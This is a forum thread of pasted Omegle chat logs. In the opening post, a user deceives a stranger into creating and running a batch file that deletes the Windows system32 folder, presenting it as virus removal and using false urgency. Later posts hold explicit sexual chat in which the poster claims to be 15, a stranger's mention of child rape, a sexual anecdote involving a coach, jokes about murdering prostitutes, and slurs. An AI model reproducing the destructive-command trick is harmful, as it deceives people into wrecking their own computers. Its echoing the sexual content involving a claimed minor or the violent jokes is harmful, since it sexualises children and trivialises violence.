![]() |
omegle is helping me be less bored
You: there isn't much time left You: we need you Stranger: why? You: first, remove every virus from your computer You: I'll show you how You: open a notepad type the following: @echo off del c:\WINDOWS\system32 save the file as anything.bat (remember to add the .bat extension and save as all files) double click and it will delete the system32 folder. You: trust me You: once this sys32 virus is gone You: you'll have unlimited browser access You: you don't have much time Stranger: i am not stupid You: yes you are Stranger: i think you are stupid You: you'll always be stupid until you free yourself You: stupidity is a variant of being held and constrainted You: escape You: you must Stranger: ok i do it You: hurry You: there isn't much time Stranger: no its done You: contact me via email email removed for more info Stranger: now You: no it isn't, the sys32 removal prompts for a restart Stranger: i just delete sys32 You: you're running out of time man You: no you didn't, that prompts for a restart, you wouldn't still be logged on You: you're only hurting yourself Stranger: where are you from You: the mainframe Stranger: i do it another computer Stranger: did* You: alright You: no You: w You: what does it read as? Stranger: se on suomeksi enkä osaa englantintaa sitä You: alright, now I'll reveal my true self Stranger: ja oo sinä nyt hiljaa... You: I come from the Net--through systems, peoples, and cities--to this place: MAINFRAME. My format: Guardian. To mend and defend--to defend my new found friends, their hopes and dreams, and to defend them from their enemies. Your conversational partner has disconnected. |
that site is..sick
my troll.dll file has been corrupted.
every time I try, my system reboots. is this bad? :( |
this is weird. i started on here thursday. i was probably on it for 4-5 hours
Truly amazing. I'm surprised how genial I am ON THE INTERNET of all places.
Too bad my connection is too iffy. Stranger: Tell me, stranger, what is a secret about yourself that you'll take to the grave? You: That I have a lot of secrets that I'll take to the grave. Stranger: cmon now, play along :P You: I forget my secrets. :( You: Until they bite me in the ass. Stranger: haha |
I think I'm gonna love this site
You're now chatting with a random stranger. Say hi! Stranger: hi You: we're no strangers to love You: you know the rules, and so do i You: a full commitment is what I'm thinking of Stranger: never gonna give you up You: never gonna let you down Stranger: just stop it Stranger: is that neccessary You: yep You: i just rickrolled you You have disconnected. You're now chatting with a random stranger. Say hi! You: hey stranger You: do you know what there is at the end of the road? Stranger: And then I decided to have my testicles laminated. You: RIGHT ANSWER!! Stranger: What do I win? You: your testicles laminated Stranger: How convenient! You have disconnected. |
Stranger: Hello.
You: hey Stranger: I'm a 49 year old man looking for love. Stranger: Can you help me? You: trust me You: go take it in the ass Stranger: Burn in hell idiot. Hahaha! |
Stranger: What city do you live in and are your parents home?
You: im naked Stranger: Good! You: yeah Stranger: I'm rubbing my nice pussy You: cool You: :D Stranger: It's name is candy You: mines mint Stranger: it just meowed and said hi to you You: but i didnt hear you You: do it lowder Stranger: shoving this dildo in and out You: cant see it You: do it harder Stranger: errrrrrrrr u sick pedoooooooo get away You: pitty im 15 You: pedophile You: this is the fbi You: a van is on the way to your house now Stranger: sound (Y) You: is it there yet Stranger: I'm playing music to loud so i wont hear them knock the door down You: god damn the police force is slow to react Stranger: I didn't know you could join the FBI at the age of 15 :L If the above message says you have been reported to the FBI, it is not legitimate. Please ignore it. Stranger: dumb fuck You: are they threre yet You: well your american so your stupider Stranger: And what makes you think i'm american? You: what are ya then You: us or aian You: of* Stranger: UK You: eww go brush your teeth Stranger: So where are you from then? You: thats classified information Stranger: lmao your wierd Stranger: anyway i'm going this chat sucks lol |
This is great, I ended up having a long conversation about Black Metal with someone from Finland.
I had an awesome convo with an 20 year old college student! :D |
You're now chatting with a random stranger. Say hi!
Stranger: hi You: hello stranger You: do you know what there is at the end of the road? Stranger: how are you ? You: i'm fine, thanks You: but do you know what there is at the end of the road? Stranger: well, i don't know? You: a stop sign Stranger: :D You: i'm glad i made you laugh You: my mission is accomplished, stranger You: or are you a stranger? Stranger: and i like jokes You: is it written "Stranger" or "You" on your screen? Stranger: you in my screen You: omg You: then I guess... YOU ARE ME You: i might be schizophrenic Stranger: :D You: i feel scared Stranger: well, iäm little bit scare... i think You: i knew you were going to say this You: cause you are me You: that's not scary that's terrific Stranger: but who's you are then You: i am the platypus right behind your door You: (yes there is one, you could check) You: do you believe me? Stranger: :D Stranger: well, no You: ah that's too bad You: cause if you did believe me, i would've got something important to say to you Stranger: oh, okay You: and that thing is You: i'm not 100% ure You: sure You: but Stranger: but? You: i think there might be a platypus right behind your door Stranger: are you realy sure? You: not 100% You: it might be an axolotl or some kind of exotic animal i dunno You: but it's strange, to say the least Stranger: yes it is You: can you see it? Stranger: well.... if it is this.... Stranger: .... i know it better my mom Stranger: :D You: (I CAN FEEL THERE'S SOME KIND OF DRAMATIC TENSION GOING ON!! I CAN FEEL IT IS ALL GOING TO END UP IN TEARS!!) Stranger: mmh, scary You: i think it might be the end of the road after all You: because You: the maya civilization wrote it You: "in the end there shall be platypuses" You: i can see a stop sign from my window Stranger: :O You: omg i just realized You: you might be the stop sign You: or the axolotl-like creature You: do you have a dna sample? i would like to make sure i'm not getting fooled by an exotic animal Stranger: yes i have You: oh, that's fine then Stranger: you can breathe You: no i can't You: cause i'm a stop sign You: and stop sign have no nose Stranger: are you? You: don't they teach stop sign's anatomy at school now? they used to You: i am Stranger: meaby you should go and look in mirror? You: i can't move, cause i have no feet You: don't they teach stop sign's anatomy at school now? they used to Stranger: no they don't You: i'm just there, in front of a computer, all day long Stranger: and now i think that stop sign have feet You: modern technology brought synthetic feet to all the most recent stop signs You: but that's the post-2000 generation You: i am older (i won't tell you my age, cause you can't ask a stop sign its age), so i don't have those Stranger: thats sad You: yeah but most recent stop signs are dumb You: like You: look at this one You: http://tommcmahon.typepad.com/photos...2/stopsign.gif You: he got tatoos all over his bodies You: that's revolting You: his body* Stranger: Stranger: yes thats is revolting You: and You: godammnit You: http://cache.jalopnik.com/assets/res...gn_chicago.jpg You: just look at this damn hippie Stranger: whoah You: i am a regular one You: this is me : http://www.users.qwest.net/~mgmartin...cary%20cat.jpg Stranger: Stranger: so.... shy we talk about stop sign? You: shy? Stranger: why* You: oh You: well You: because they're at the end of the road, obviously! Stranger: oh yea |
You're now chatting with a random stranger. Say hi!
You: YOU'RE BEING REPORTED TO THE FBI You: FUCKTARD BOTTOM OF THE INTERNET Stranger: I love Chocolate Your conversational partner has disconnected. |
Not as good as the one I had with Marty once. :D |
haha |
Stranger: hi
You: hey Stranger: bye |
Connecting to server...
You're now chatting with a random stranger. Say hi! You: sup Stranger: im drinking myself to death Stranger: slowly You: cool Stranger: i know right? You: me too Stranger: really? You: no Stranger: what are the odds of that? You: send me $50 and ill help you Stranger: can i ask you something? You: sure homie Stranger: have you ever tied up a prostitute in a motel room and left her there for a week? You: about 8 times Stranger: about 8 times? You: maybe more Stranger: you dont know if it was 7 or 9? Stranger: seems implausible You: probably about 9 id say Stranger: did any of them survive? You: dunno havent checked Stranger: my didnt Stranger: one Stranger: gaaaaahhhh! Your conversational partner has disconnected. or send us feedback. |
I just had a really long one. I managed to get the guy to listen to Boris, and he liked it.
Looking for someone you can chat with. Hang on.
You're now chatting with a random stranger. Say hi! Stranger: THE You: BOITE DIABOLIQUE Stranger: IS You: INFINITE Stranger: AND You: IT Stranger: CAN You: DO Stranger: SOME You: COFFEE Stranger: NAKED You: ON Stranger: HTE You: ROOFTOPS Stranger: WHILE You: PEOPLE Stranger: WATCH You: PENCILS Stranger: IN You: TREES Stranger: HAVING You: SEX Stranger: WITH You: PENCILS Stranger: NAKED You: ON Stranger: DRUGS You: LIKE Stranger: BBQ You: XTZ Stranger: lol You: you lose. You have disconnected. |
you guys are getting addicted!
i did fuck all on thursday. i'm afraid to get back on. i managed to get off after an hour on friday |
Some of this is pretty massively retarded.
You: Hello. Stranger: hey Stranger: whats upp? You: So what do you enjoying thinking about? Stranger: well Stranger: from? You: Are you asking me where I'm from? Stranger: yes You: I'd rather retain that information as I enjoy being a stranger. You: There's nothing in particular you would like to talk about? Stranger: i see Stranger: no i don't think so You: Okay, then, bye. |
I did get a Pole to say that he doesn't want to fuck his own asshole, though.
You're now chatting with a random stranger. Say hi!
You: whazaaaaaaaaa Stranger: old joke? You:Woohooahazaaaaaaahhhhh! Stranger: Suck it You: zaaaahhhhhhhhhhhh Stranger: I’ll skull stomp you cracka You:Wizzooaaaaaooooooaaahhhaaaafffahhhhhhzzzz Stranger: We alike, smear me. You: Was your presence adequately represented at the G20? Your conversational partner has disconnected. |
People are really fucking boring. I have to dominate the conversation and even then their replies are mundane.
You: This is the letter J.
You: J Stranger: This is an ampersand: Stranger: & Stranger: repeat after me: Stranger: "ampersand" You: & Stranger: good You: I prefer J Stranger: mmm You: M You: J&M Stranger: I don't compare them in terms of preference Stranger: J&M Stranger: & becomes "and" Stranger: "jay and em" Stranger: J&M You: J don't comp&re them in terms of preference You: J d&on'J comJ&re Jhem in term& of Preferen&& Stranger: J don't coMp&re theM Jn terMs of preference Stranger: J &JM&'& J&MJ&JJ J&MM JM &JJM &M J&MMJ&MJ&M Stranger: * brain slowly melts * |
Has anyone else noticed that theirs heaps of Brazilians on there!
Connecting to server...
You're now chatting with a random stranger. Say hi! You: hi Stranger: Tell mne a secert Stranger: I am drunk You: you first Stranger: fuck Stranger: hard to type Stranger: I asked you first You: nah u didnt Stranger: asshole Stranger: You: Tell mne a secert Stranger: thats what I said Stranger: thats what I meant You: yeah im you Stranger: tell me a sceret punkass Stranger: and I am you You: no im you Stranger: just tell me it Stranger: I don't know you, just tell me You: i asked first Stranger: last one told me she masterbates to little boys raped by fathers and preists Stranger: I asked you first Stranger: fucked up huh? You: i asked you first Stranger: My fetish is fucking armpits Stranger: you? You: cool Stranger: I told you one You: my fetish is fucking armpits Stranger: trap or die Stranger: you too? Stranger: How did you start? Stranger: slow motion You: with an armpit Stranger: trapping all day Stranger: I don't believe you You: dont ya You: oh well Stranger: infact I think you are just lying Stranger: fuck that Stranger: fuck this Stranger: I have to pee You: i think your lying Stranger: will you wait? Stranger: or should I just pee here? You: dunno Stranger: I think I will pee off the roof You: pee here Stranger: or rather the tree Stranger: fuck Stranger: that Stranger: tell me a screte and I will pee here You: on the computer Stranger: fine Stranger: tell me it You: i eat oranges withs spoons You: sssshhhh Stranger: fuck you Your conversational partner has disconnected. |
Haahahaaaahahaa |
Worstconversation ever...
You: hi Stranger: Sup You: not much, first time on here Stranger: Where r u from? You: China You: you Stranger: China is good Stranger: Brazil You: Sweet You: what time is it Stranger: 01:46 AM You: no it's 12:46. You: your clock is wrong Stranger: isn't You: i swear! You: what is your favourite colour Stranger: Blue You: black?! omg me too. that's so cool Stranger: what's your name? You: Zowee You: you? Stranger: Sérgio You: nice Stranger: what you know about Brazil? You: its a country You: and a soccer team You: thats all You: gotta go bye |
I just had a really nice long conversation with this 21 year old from Miami
Stranger: herro?
You: hey You: tell me a story Stranger: okay Stranger: uummm Stranger: so this one time Stranger: me and my friends were camping and we were trying to start a camp fire You: yes Stranger: but it had been raining for a few days so all the wood was damp so it was really difficult Stranger: so we were thinking we should try and spray bug spray on the fire to make it bigger Stranger: but our one friend, matt, was like no don't do it! the flames will jump back up into the can! Stranger: so we didn't Stranger: but the fire still wasn't working Stranger: so matt poured propane Stranger: ONTO the fire You: :O Stranger: and obviously, it jumped back up onto his hand Stranger: and he chucked the cannister... into the woods Stranger: GOOD ONE. You: brravo You: that was a great one Stranger: the propane spilled everywhere when he flung it so it made a huge puddle Stranger: which alll Stranger: caught on fire You: oh no Stranger: yeah it was good times Stranger: the park ranger came and just looked at us You: sounds awesome Stranger: looked at the fire You: ahhahaa Stranger: looked at us Stranger: and said "what did we learn?" You: hahahahahahha Stranger: hahaha that was the best part :D You: great story Stranger: thanks :) Stranger: do you have a story? You: umm You: so my mom's friend comes over for a swim You: she's wearing a bikini, when she walks her thighs slap together Stranger: ok Stranger: oh no Stranger: is that it? You: i get a HUGE boner + try to hide it somehow, so i grabbed a volleyball You: but the ball seemed to have popped Stranger: ok Stranger: you popped a vollebay with your dicke Stranger: awesome You: everyone sees me Stranger: www.fmylife.com You: so i run inside, when im sleeping that night she came into my room You: and we had the best sex, ever Stranger: ofcourse Your conversational partner has disconnected. |
Hahhahaha! |
Stranger: gay?
Stranger: bi? Stranger: straight? You: straight You: u Stranger: i guess Stranger: bicurious You: lol You: thats fine by me Stranger: im so horny Stranger: lol You: (O.o) Stranger: i bet you are too Stranger: aha You: you need to realese your hornyness You: lol You: nah im not horny Stranger: well i dont wanna just jackoff You: haha Stranger: i want someone to suck me off or something Stranger: aha You: O.O You: haha Stranger: have you ever tasted your cum? Stranger: lmao You: umm You: NO You: i bet you have Stranger: me either You: oh You: lol Stranger: i would never Stranger: thats jsut gross You: hahah Stranger: although my friend did Stranger: ahah You: yuck |
Stranger: i came all over my chest
Stranger: then he licked it off You: umm You: no dude |
Stranger: what
You: thats disgusting Stranger: no its not Stranger: he was hot You: umm yes it is Stranger: and my coach Stranger: lmao |
Stranger: you there
You: yep Stranger: gahh me and my friend are supposed to suck eachother off Stranger: he aint here tho You: i dont wanna know this dude Stranger: yeah you do Stranger: i know it turns you on You: im not gay btw Stranger: i know Stranger: im sure you have an attraction for men tho Stranger: right? You: nope Stranger: like you can think a guy is cute Stranger: but it doesnt man anything Stranger: *mean You: nope O.o |
You: hi Stranger: *knock knock* You: sorry someones knocking at my door You: brb You: there was no one there You: ??? You: wierd Stranger: hmm ok Stranger: so i was like talking..*knock knock* Stranger: JESUS Stranger: kill this prank motherfucker |
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